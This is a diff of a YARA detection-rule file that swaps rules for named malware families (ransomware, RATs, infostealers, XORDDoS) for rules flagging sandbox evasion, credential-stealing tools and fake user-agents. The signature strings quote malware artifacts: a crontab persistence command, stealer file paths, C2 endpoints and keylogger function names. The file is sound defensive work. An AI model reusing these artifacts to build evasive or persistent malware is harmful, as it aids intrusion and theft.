 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2080-L2100"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1514-L1522"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e614b827bd8d065e94852fed01497c785bf90c52c3624aff9939b3f40ecf96a4"
-		score = 75
-		quality = 75
+		logic_hash = "ae8080dad4481b6a2e295c29d3ed24e86da83575e1a5aeda8b1317e6caa74707"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.PYSA"
+		importance = 20
 
 	strings:
-		$s1 = "%s\\Readme.README" fullword wide
-		$s2 = "Every byte on any types of your devices was encrypted" ascii
-		$s3 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 74 65 78 74 00 (50|70) (59|79) (53|73) (41|61) }
-		$s4 = { 6c 65 67 61 6c 6e 6f 74 69 63 65 63 61 70 74 69 6f 6e 00 00 (50|70) (59|79) (53|73) (41|61) }
-		$s5 = { 2e 62 61 74 00 00 6f 70 65 6e 00 00 00 00 53
-                4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f
-                66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72
-                65 6e 74 56 65 72 73 69 6f 6e 5c 50 6f 6c 69
-                63 69 65 73 5c 53 79 73 74 65 6d 00 00 00 }
-		$f1 = ".?AVPK_EncryptorFilter@CryptoPP@@" ascii
-		$f2 = ".?AV?$TF_EncryptorImpl@" ascii
-		$f3 = "@VTF_EncryptorBase@CryptoPP@@" ascii
+		$s1 = "Afx:400000:0" fullword ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of ( $f* ) and 3 of ( $s* )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Polar : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Anti_Oldcopypaste : FILE
 {
 	meta:
-		description = "Detects Polar ransomware"
+		description = "Detects executables potentially checking for WinJail sandbox window"
 		author = "ditekSHen"
-		id = "ab4e4478-5417-5918-b5df-5b6ffe7438a9"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "10a70ad3-c37e-5522-ae3f-3f85f89f9394"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2102-L2123"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1524-L1543"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4f05a8ace9a03d02f54f0ebdd5349d1d1b23db8e34aa71edd44eebf02b88745c"
-		score = 75
-		quality = 75
+		logic_hash = "084a1613eaf1df4cd54c44e4389b9edc1c44b4b947a8c4416cb7cbdabc186747"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Ransomware.Polar"
+		importance = 20
 
 	strings:
-		$s1 = "Encrypt Failed ! ErrorMessage :" wide
-		$s2 = ".locked" fullword wide
-		$s3 = ".cryptd" fullword wide
-		$s4 = "$SysReset" fullword wide
-		$s5 = "Polar.Properties.Resources" ascii wide
-		$s6 = "AES_EnDecryptor.Basement" fullword ascii
-		$s7 = "RunCMDCommand" fullword ascii
-		$s8 = "killerps_list" fullword ascii
-		$s9 = "clearlog" fullword ascii
-		$s10 = "encryptFile" fullword ascii
-		$s11 = "changeBackPictrue" fullword ascii
-		$pdb1 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x86\\Release\\Encode.pdb" ascii
-		$pdb2 = "\\Ransomware_ALL_encode\\dir_file\\obj\\x64\\Release\\Encode.pdb" ascii
+		$s1 = "This file can't run into Virtual Machines" wide
+		$s2 = "This file can't run into Sandboxies" wide
+		$s3 = "This file can't run into RDP Servers" wide
+		$s4 = "Run without emulation" wide
+		$s5 = "Run using valid operating system" wide
+		$v1 = "SbieDll.dll" fullword wide
+		$v2 = "USER" fullword wide
+		$v3 = "SANDBOX" fullword wide
+		$v4 = "VIRUS" fullword wide
+		$v5 = "MALWARE" fullword wide
+		$v6 = "SCHMIDTI" fullword wide
+		$v7 = "CURRENTUSER" fullword wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 8 of ( $s* ) or ( 1 of ( $pdb* ) and 2 of ( $s* ) ) )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or all of ( $v* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Bitrat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Go_Golazagne : FILE
 {
 	meta:
-		description = "Detects BitRAT RAT"
+		description = "Detects Go executables using GoLazagne"
 		author = "ditekSHen"
-		id = "9041a21f-0f27-5e90-8429-863e361381bf"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3b54892d-8015-518c-af0b-03ddd65478f6"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2125-L2153"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1545-L1554"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "128c3c8cea0439f272de241c77fc9ed46e64419e497091e444e98123dad059cb"
-		score = 75
-		quality = 25
+		logic_hash = "9618f8a6eb9a5db01b7a58a469309220b1e22afe928006d642e5404380f312f1"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.BitRAT"
+		importance = 20
 
 	strings:
-		$s1 = "\\plg\\" fullword ascii
-		$s2 = "klgoff_del" fullword ascii
-		$s3 = "files_delete" ascii
-		$s4 = "files_zip_start" fullword ascii
-		$s5 = "files_exec" fullword ascii
-		$s6 = "drives_get" fullword ascii
-		$s7 = "srv_list" fullword ascii
-		$s8 = "con_list" fullword ascii
-		$s9 = "ddos_stop" fullword ascii
-		$s10 = "socks5_srv_start" fullword ascii
-		$s11 = "/getUpdates?offset=" fullword ascii
-		$s12 = "Action: /dlex" fullword ascii
-		$s13 = "Action: /clsbrw" fullword ascii
-		$s14 = "Action: /usb" fullword ascii
-		$s15 = "/klg" fullword ascii
-		$s16 = "klg|" fullword ascii
-		$s17 = "Slowloris" fullword ascii
-		$s18 = "Bot ID:" ascii
-		$t1 = "<sz>N/A</sz>" fullword ascii
-		$t2 = "<silent>N/A</silent>" fullword ascii
+		$s1 = "/goLazagne/" ascii nocase
+		$s2 = "Go build ID:" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 7 of ( $s* ) or ( 4 of ( $s* ) and 1 of ( $t* ) ) )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule DITEKSHEN_MALWARE_Win_Poullight : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_CSPROJ : FILE
 {
 	meta:
-		description = "Detects Poullight infostealer"
+		description = "Detects suspicious .CSPROJ files then compiled with msbuild"
 		author = "ditekSHen"
-		id = "c80143f8-9c44-5e96-b1ff-2adb4bf031e4"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "99f9fbd0-9435-511a-b9f5-7ea11e655b79"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2155-L2176"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1556-L1568"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e60ffb10892d35664a088d69c965e130f87bb1a59c257d484bdfe5085074bccd"
-		score = 75
-		quality = 75
+		logic_hash = "e41c82ab0da47192463f76192ea7748dfcf59193475871daf1a7a4ff2fda4d52"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		snort2_sid = "920074-920075"
-		snort3_sid = "920074-920075"
-		clamav_sig = "MALWARE.Win.Trojan.Poullight"
+		importance = 20
 
 	strings:
-		$s1 = "zipx" fullword wide
-		$s2 = "{0}Windows Defender.exe" fullword wide
-		$s3 = "pll_test" fullword wide
-		$s4 = "loginusers.vdf" wide
-		$s5 = "Stealer by Nixscare" wide
-		$s6 = "path_lad" fullword ascii
-		$s7 = "<CheckVM>" ascii
-		$s8 = "Poullight.Properties" ascii
-		$s9 = "</ulfile>" fullword wide
-		$s10 = "{0}processlist.txt" fullword wide
-		$s11 = "{0}Browsers\\Passwords.txt" fullword wide
+		$s1 = "ToolsVersion=" ascii
+		$s2 = "/developer/msbuild/" ascii
+		$x1 = "[DllImport(\"\\x" ascii
+		$x2 = "VirtualAlloc(" ascii nocase
+		$x3 = "CallWindowProc(" ascii nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint32( 0 ) == 0x6f72503c and ( all of ( $s* ) and 2 of ( $x* ) )
 }
-rule DITEKSHEN_MALWARE_Win_Snakekeylogger : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_Sandbox_Evasion_Filescomb : FILE
 {
 	meta:
-		description = "Detects Snake Keylogger"
+		description = "Detects executables referencing specific set of files observed in sandob anti-evation, and Emotet"
 		author = "ditekSHen"
-		id = "e44bf33c-916d-5dc3-ba2a-89e13f1511a2"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "04108277-03ac-5479-ac9f-0c7377dc70b8"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2178-L2207"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1694-L1711"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7d787026b290c3c6a43c7de83233f22980733e7401260ff2f763e6f1b534ecba"
-		score = 75
-		quality = 67
+		logic_hash = "d9f235e212e75cef51e3321f49968c75523304dc94a2b7cf3965c9f88d039b43"
+		score = 40
+		quality = 23
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.SnakeKeylogger"
+		importance = 20
 
 	strings:
-		$id1 = "SNAKE-KEYLOGGER" fullword ascii
-		$id2 = "----------------S--------N--------A--------K--------E----------------" ascii
-		$s1 = "_KPPlogS" fullword ascii
-		$s2 = "_Scrlogtimerrr" fullword ascii
-		$s3 = "_Clpreptimerr" fullword ascii
-		$s4 = "_clprEPs" fullword ascii
-		$s5 = "_kLLTIm" fullword ascii
-		$s6 = "_TPSSends" fullword ascii
-		$s7 = "_ProHfutimer" fullword ascii
-		$s8 = "GrabbedClp" fullword ascii
-		$s9 = "StartKeylogger" fullword ascii
-		$x1 = "$%SMTPDV$" wide
-		$x2 = "$#TheHashHere%&" wide
-		$x3 = "%FTPDV$" wide
-		$x4 = "$%TelegramDv$" wide
-		$x5 = "KeyLoggerEventArgs" ascii
-		$m1 = "| Snake Keylogger" ascii wide
-		$m2 = /(Screenshot|Clipboard|keystroke) Logs ID/ ascii wide
-		$m3 = "SnakePW" ascii wide
-		$m4 = "\\SnakeKeylogger\\" ascii wide
+		$s1 = "c:\\take_screenshot.ps1" ascii wide nocase
+		$s2 = "c:\\loaddll.exe" ascii wide nocase
+		$s3 = "c:\\email.doc" ascii wide nocase
+		$s4 = "c:\\email.htm" ascii wide nocase
+		$s5 = "c:\\123\\email.doc" ascii wide nocase
+		$s6 = "c:\\123\\email.docx" ascii wide nocase
+		$s7 = "c:\\a\\foobar.bmp" ascii wide nocase
+		$s8 = "c:\\a\\foobar.doc" ascii wide nocase
+		$s9 = "c:\\a\\foobar.gif" ascii wide nocase
+		$s10 = "c:\\symbols\\aagmmc.pdb" ascii wide nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and ( all of ( $id* ) or 6 of ( $s* ) or ( 1 of ( $id* ) and 3 of ( $s* ) ) or 4 of ( $x* ) ) ) or ( 2 of ( $m* ) )
+		uint16( 0 ) == 0x5a4d and 6 of them
 }
-rule DITEKSHEN_MALWARE_Linux_Xorddos : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_VM_Evasion_Virtdrvcomb : FILE
 {
 	meta:
-		description = "Detects XORDDoS"
+		description = "Detects executables referencing combination of virtualization drivers"
 		author = "ditekSHen"
-		id = "0ca581c3-bce2-5b4f-8146-9aeb49b88813"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "88f271d5-07a3-5ca6-9536-4f68bccf49bc"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2209-L2220"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1713-L1757"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "192378d903316c1d80b064e78feb6ed9d2ffc9e6c7dc0c8df223d83d17e4e8d9"
-		score = 75
-		quality = 75
+		logic_hash = "a7bbd05e17b8a111b841ed2a86b4794cde8972a673acf331d800029e54d8f602"
+		score = 40
+		quality = 43
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "for i in `cat /proc/net/dev|grep :|awk -F: {'print $1'}`; do ifconfig $i up& done" fullword ascii
-		$s2 = "cp /lib/libudev.so /lib/libudev.so.6" fullword ascii
-		$s3 = "sed -i '/\\/etc\\/cron.hourly\\/gcc.sh/d' /etc/crontab && echo '*/3 * * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab" fullword ascii
-		$s4 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)" fullword ascii
+		$p1 = "prleth.sys" ascii wide
+		$p2 = "prlfs.sys" ascii wide
+		$p3 = "prlmouse.sys" ascii wide
+		$p4 = "prlvideo.sys	" ascii wide
+		$p5 = "prltime.sys" ascii wide
+		$p6 = "prl_pv32.sys" ascii wide
+		$p7 = "prl_paravirt_32.sys" ascii wide
+		$vb1 = "VBoxMouse.sys" ascii wide
+		$vb2 = "VBoxGuest.sys" ascii wide
+		$vb3 = "VBoxSF.sys" ascii wide
+		$vb4 = "VBoxVideo.sys" ascii wide
+		$vb5 = "vboxdisp.dll" ascii wide
+		$vb6 = "vboxhook.dll" ascii wide
+		$vb7 = "vboxmrxnp.dll" ascii wide
+		$vb8 = "vboxogl.dll" ascii wide
+		$vb9 = "vboxoglarrayspu.dll" ascii wide
+		$vb10 = "vboxoglcrutil.dll" ascii wide
+		$vb11 = "vboxoglerrorspu.dll" ascii wide
+		$vb12 = "vboxoglfeedbackspu.dll" ascii wide
+		$vb13 = "vboxoglpackspu.dll" ascii wide
+		$vb14 = "vboxoglpassthroughspu.dll" ascii wide
+		$vb15 = "vboxservice.exe" ascii wide
+		$vb16 = "vboxtray.exe" ascii wide
+		$vb17 = "VBoxControl.exe" ascii wide
+		$vp1 = "vmsrvc.sys" ascii wide
+		$vp2 = "vpc-s3.sys" ascii wide
+		$vw1 = "vmmouse.sys" ascii wide
+		$vw2 = "vmnet.sys" ascii wide
+		$vw3 = "vmxnet.sys" ascii wide
+		$vw4 = "vmhgfs.sys" ascii wide
+		$vw5 = "vmx86.sys" ascii wide
+		$vw6 = "hgfs.sys" ascii wide
 
 	condition:
-		uint32( 0 ) == 0x464c457f and 3 of them
+		uint16( 0 ) == 0x5a4d and ( ( 2 of ( $p* ) and ( 2 of ( $vb* ) or 2 of ( $vp* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vb* ) and ( 2 of ( $p* ) or 2 of ( $vp* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vp* ) and ( 2 of ( $p* ) or 2 of ( $vb* ) or 2 of ( $vw* ) ) ) or ( 2 of ( $vw* ) and ( 2 of ( $p* ) or 2 of ( $vb* ) or 2 of ( $vp* ) ) ) )
 }
-rule DITEKSHEN_MALWARE_Win_Blacknet : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Nonewindowsua : FILE
 {
 	meta:
-		description = "Detects BlackNET RAT"
+		description = "Detects Windows executables referencing non-Windows User-Agents"
 		author = "ditekSHen"
-		id = "c1ece46a-3cd9-54aa-a105-1c5b19357a7e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "3bf62a67-4c21-5bcc-a356-424e798141f1"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2222-L2250"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1759-L1784"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64e00325a5a6a595067c6133800e73d943f45e2783475c24ed4a9bd9937fe0d6"
-		score = 75
-		quality = 75
+		logic_hash = "fb65643fd93ce4dbec0f98259b3dacda748a3f62f71258726073fdb3e354ab42"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		snort2_sid = "920079-920082"
-		snort3_sid = "920079-920082"
-		clamav_sig = "MALWARE.Win.Trojan.BlackNET"
+		importance = 20
 
 	strings:
-		$s1 = "SbieCtrl" fullword wide
-		$s2 = "SpyTheSpy" fullword wide
-		$s3 = "\\BlackNET.dat" fullword wide
-		$s4 = "StartDDOS" fullword wide
-		$s5 = "UDPAttack" fullword wide
-		$s6 = "ARMEAttack" fullword wide
-		$s7 = "TCPAttack" fullword wide
-		$s8 = "HTTPGetAttack" fullword wide
-		$s9 = "RetriveLogs" fullword wide
-		$s10 = "StealPassword" fullword wide
-		$s11 = "/create /f /sc ONSTART /RL HIGHEST /tn \"'" fullword wide
-		$b1 = "DeleteScript|BN|" fullword wide
-		$b2 = "|BN|Online" fullword wide
-		$b3 = "NewLog|BN|" fullword wide
-		$cnc1 = "/getCommand.php?id=" fullword wide
-		$cnc2 = "/upload.php?id=" fullword wide
-		$cnc3 = "connection.php?data=" fullword wide
-		$cnc4 = "/receive.php?command=" fullword wide
+		$ua1 = "Mozilla/5.0 (Macintosh; Intel Mac OS" wide ascii
+		$ua2 = "Mozilla/5.0 (iPhone; CPU iPhone OS" ascii wide
+		$ua3 = "Mozilla/5.0 (Linux; Android " ascii wide
+		$ua4 = "Mozilla/5.0 (PlayStation " ascii wide
+		$ua5 = "Mozilla/5.0 (X11; " wide ascii
+		$ua6 = "Mozilla/5.0 (Windows Phone " ascii wide
+		$ua7 = "Mozilla/5.0 (compatible; MSIE 10.0; Macintosh; Intel Mac OS X 10_7_3; Trident/6.0)" wide ascii
+		$ua8 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows Phone OS 7.5; Trident/5.0; IEMobile/9.0)" wide ascii
+		$ua9 = "HTC_Touch_3G Mozilla/4.0 (compatible; MSIE 6.0; Windows CE; IEMobile 7.11)" wide ascii
+		$ua10 = "Mozilla/4.0 (compatible; MSIE 7.0; Windows Phone OS 7.0; Trident/3.1; IEMobile/7.0; Nokia;N70)" wide ascii
+		$ua11 = "Mozilla/5.0 (BlackBerry; U; BlackBerry " wide ascii
+		$ua12 = "Mozilla/5.0 (iPad; CPU OS" wide ascii
+		$ua13 = "Mozilla/5.0 (iPad; U;" ascii wide
+		$ua14 = "Mozilla/5.0 (IE 11.0;" ascii wide
+		$ua15 = "Mozilla/5.0 (Android;" ascii wide
+		$ua16 = "User-Agent: Internal Wordpress RPC connection" ascii wide
+		$ua17 = "Mozilla / 5.0 (SymbianOS" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 9 of ( $s* ) or all of ( $cnc* ) or all of ( $b* ) or 12 of them )
+		uint16( 0 ) == 0x5a4d and 1 of them
 }
-rule DITEKSHEN_MALWARE_Win_Stormkitty : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Toomanywindowsua : FILE
 {
 	meta:
-		description = "Detects StormKitty infostealer"
+		description = "Detects executables referencing many varying, potentially fake Windows User-Agents"
 		author = "ditekSHen"
-		id = "a061a1c0-9ed5-5048-85df-4d7ed6995e92"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "28dba61e-b2da-5708-b82f-a139d0929a7d"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2252-L2269"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1786-L1810"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "5d139aad6932f177cd14e0356f822ad68ddc659ea4fabd2fd2fbcbc8bad58888"
-		score = 75
-		quality = 75
+		logic_hash = "a79ea9b8471148176c210fe834e7b2f0549291956489e2853235a75ea3e4e1db"
+		score = 40
+		quality = 45
 		tags = "FILE"
-		clamav_sig = "MALWARE.Win.Trojan.StormKitty"
+		importance = 20
 
 	strings:
-		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
-		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
-		$x3 = "StormKitty" fullword ascii
-		$s1 = "GetBSSID" fullword ascii
-		$s2 = "GetAntivirus" fullword ascii
-		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
-		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
-		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
-		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		$ua1 = "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36" ascii wide
+		$ua2 = "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36" ascii wide
+		$ua3 = "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0" ascii wide
+		$ua4 = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0" ascii wide
+		$ua5 = "Mozilla/5.0 (Windows NT 6.1; rv:27.3) Gecko/20130101 Firefox/27.3" ascii wide
+		$ua6 = "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US)" ascii wide
+		$ua7 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)" ascii wide
+		$ua8 = "Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/4.0; InfoPath.2; SV1; .NET CLR 2.0.50727; WOW64)" ascii wide
+		$ua9 = "Opera/12.0(Windows NT 5.2;U;en)Presto/22.9.168 Version/12.00" ascii wide
+		$ua10 = "Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14" ascii wide
+		$ua11 = "Mozilla/5.0 (Windows NT 6.0; rv:2.0) Gecko/20100101 Firefox/4.0 Opera 12.14" ascii wide
+		$ua12 = "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14" ascii wide
+		$ua13 = "Opera/12.80 (Windows NT 5.1; U; en) Presto/2.10.289 Version/12.02" ascii wide
+		$ua14 = "Opera/9.80 (Windows NT 6.1; U; es-ES) Presto/2.9.181 Version/12.00" ascii wide
+		$ua15 = "Opera/9.80 (Windows NT 5.1; U; zh-sg) Presto/2.9.181 Version/12.00" ascii wide
+		$ua16 = "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7" ascii wide
+		$ua17 = "Mozilla/5.0 (Windows; U; Windows NT 6.1; tr-TR) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
+		uint16( 0 ) == 0x5a4d and 5 of them
 }
-
-rule DITEKSHEN_MALWARE_Win_Bulz01 : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_VM_Evasion_Macaddrcomb : FILE
 {
 	meta:
-		description = "Detects trojan loader"
+		description = "Detects executables referencing virtualization MAC addresses"
 		author = "ditekSHen"
-		id = "4ac4125b-70f5-5cda-ae45-fd5713e25a6e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "7e399d31-090a-57f7-89fa-0a2c4e563283"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2271-L2281"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1812-L1827"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29884dda4936016660f5d1e33ffcf97a20c7d3116483a5895a5e2a1dd4ac9e9f"
-		score = 75
-		quality = 75
+		logic_hash = "53a87bffc327c38545d9f213834726af9a1fbe86f273e189dc355567e6a671bf"
+		score = 40
+		quality = 29
 		tags = "FILE"
+		importance = 20
 
 	strings:
-		$s1 = "DisableTrivet.dll" fullword ascii
+		$s1 = "00:03:FF" ascii wide nocase
+		$s2 = "00:05:69" ascii wide nocase
+		$s3 = "00:0C:29" ascii wide nocase
+		$s4 = "00:16:3E" ascii wide nocase
+		$s5 = "00:1C:14" ascii wide nocase
+		$s6 = "00:1C:42" ascii wide nocase
+		$s7 = "00:50:56" ascii wide nocase
+		$s8 = "08:00:27" ascii wide nocase
 
 	condition:
-		uint16( 0 ) == 0x5a4d and pe.is_dll ( ) and all of ( $s* ) and ( pe.exports ( "Ordinal" ) or pe.exports ( "Chechako" ) or pe.exports ( "Originator" ) or pe.exports ( "Repressions" ) )
+		uint16( 0 ) == 0x5a4d and 3 of them
 }
-rule DITEKSHEN_MALWARE_Win_Revcoderat : FILE
+rule DITEKSHEN_INDICATOR_SUSPICIOUS_EXE_Discord_Regex : FILE
 {
 	meta:
-		description = "Detects RevCode/WebMonitor RAT"
+		description = "Detects executables referencing Discord tokens regular expressions"
 		author = "ditekSHen"
-		id = "4acf6742-7f5c-5126-89cc-b39b1acd922e"
-		date = "2024-11-01"
-		modified = "2024-11-01"
+		id = "4c508cae-bb25-549b-8f35-a6a22928a9a3"
+		date = "2024-06-08"
+		modified = "2024-06-08"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L2283-L2332"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_suspicious.yar#L1890-L1898"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "e5bf1ce79b7955f597df1a9e361a3be892de55cd3db767278d4ccc02ace9e9f5"
-		score = 75
-		quality = 48
+		logic_hash = "b6be1dd8e25311442a59ee2afbd99f6e9663dd06919c07269b76238af0bbd5f2"
+		score = 40
+		quality = 43
 		tags = "FILE"
-		snort2_sid = "920070"
-		snort3_sid = "920070"
-		clamav_sig = "MALWARE.Win.Trojan.RevCodeRAT"
+		importance = 20
 
 	strings:
-		$x1 = "rev-novm.dat" fullword wide
-		$x2 = "WebMonitor-" fullword wide
-		$x3 = "WebMonitor Client" fullword wide
-		$x4 = "Launch WebMonitor" fullword wide
-		$s1 = "KEYLOG_DEL" fullword ascii
-		$s2 = "KEYLOG_STREAM_START" fullword ascii
-		$s3 = "send_keylog_del" fullword ascii
-		$s4 = "send_keylog_stream_" ascii
-		$s5 = "send_shell_exec" fullword ascii
-		$s6 = "send_file_download_exec" fullword ascii
-		$s7 = "send_pdg_exec" fullword ascii
-		$s8 = "send_app_cmd_upd" fullword ascii
-		$s9 = "send_webcamstream_start" fullword ascii
-		$s10 = "send_screenstream_start" fullword ascii
-		$s11 = "send_clipboard_get" fullword ascii
-		$s12 = "send_pdg_rev_proxy_stop" fullword ascii
-		$s13 = "send_shell_stop" fullword ascii
-		$s14 = "send_wnd_cmd" fullword ascii
-		$s15 = "SCREEN_STREAM_LEGACY(): Started..." fullword ascii
